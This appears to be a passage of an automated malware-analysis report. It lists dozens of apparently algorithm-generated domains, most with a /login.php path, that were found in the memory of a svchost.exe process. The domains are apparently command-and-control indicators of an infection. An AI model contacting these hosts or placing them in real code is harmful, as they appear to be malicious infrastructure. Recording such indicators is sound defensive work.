Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1901770860.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913599148.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxysad.com/login.php
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywij.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufybop.com/login.php
Source: svchost.exe, 00000002.00000003.1933269002.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1936983553.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1931887826.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycog.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycyq.com/login.php
Source: svchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752825184.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufydep.com/login.php
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873643375.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufygav.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufygup.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufylul.com/login.php
Source: svchost.exe, 00000002.00000003.1874151632.0000000008A7F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873643375.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871323500.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufymyg.com/login.php
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypiq.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916058806.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyweq.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxov.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxov.com/Pj
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1897873188.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxov.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybig.com/login.php
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybyq.com/http://lysyxux.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycyp.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycyp.com/H
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyduv.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1882273113.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygaq.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1927868934.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygug.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjol.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjol.com/login.phpc
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjup.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujylyv.com/
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877431958.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1882273113.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujymel.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujypal.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898540147.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujypal.com/login.php
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844445717.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845203467.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujypup.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujytug.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899969240.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1901770860.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913599148.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujytug.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920021504.0000000002F98000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1926757382.0000000002F98000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918859956.0000000002F98000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1921810249.0000000002F98000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1922202257.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920519032.0000000002F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujywep.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyxoq.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumybuq.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumybuq.com/login.php
Source: svchost.exe, 00000002.00000003.1868655611.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868461374.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1867527067.0000000008ABD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1866818610.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1864780566.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873430860.0000000008ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumydoq.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumydyg.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumydyg.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1915969207.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjev.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumymap.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898540147.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumymap.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920125222.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumypop.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytol.com/login.php
Source: svchost.exe, 00000002.00000003.1753426788.0000000008ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743948651.0000000008ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytup.com/
Source: svchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytup.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytyq.com/login.php
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1832918592.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816431355.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1832741333.0000000008A7F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1822071432.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816435063.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817764559.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywaq.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887249812.0000000008ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywug.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyxul.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyboq.com/
Source: svchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycag.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycop.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycuv.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydig.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913599148.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916058806.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyguq.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyjap.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1901770860.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913599148.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916058806.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyjap.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupymol.com/login.php
Source: svchost.exe, 00000002.00000003.1868655611.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1863832827.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868461374.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1864780566.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868440755.0000000008A17000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868778341.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupymyp.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupytiq.com/http://pupytiq.com/http://qebyhag.com/H
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899969240.0000000008AE3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupytiq.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxal.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purybup.com/login.php
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873643375.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purycul.com/login.php
Source: svchost.exe, 00000002.00000003.1870965504.0000000002F45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1875548000.0000000002F49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purydip.com/
Source: svchost.exe, 00000002.00000003.1870965504.0000000002F45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1875548000.0000000002F49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purydip.com/P:
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryjeq.com/login.php
Source: svchost.exe, 00000002.00000003.1933269002.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1936983553.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1936268348.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylal.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purymog.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purymog.com/login.php
Source: svchost.exe, 00000002.00000003.1929613840.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1927868934.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purypig.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purypyq.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purywyl.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryxag.com/login.php
Source: svchost.exe, 00000002.00000003.1744736158.0000000008AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752892568.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752825184.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryxuq.com/login.php
Source: svchost.exe, 00000002.00000003.1836522113.0000000008B5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvybeg.com/H
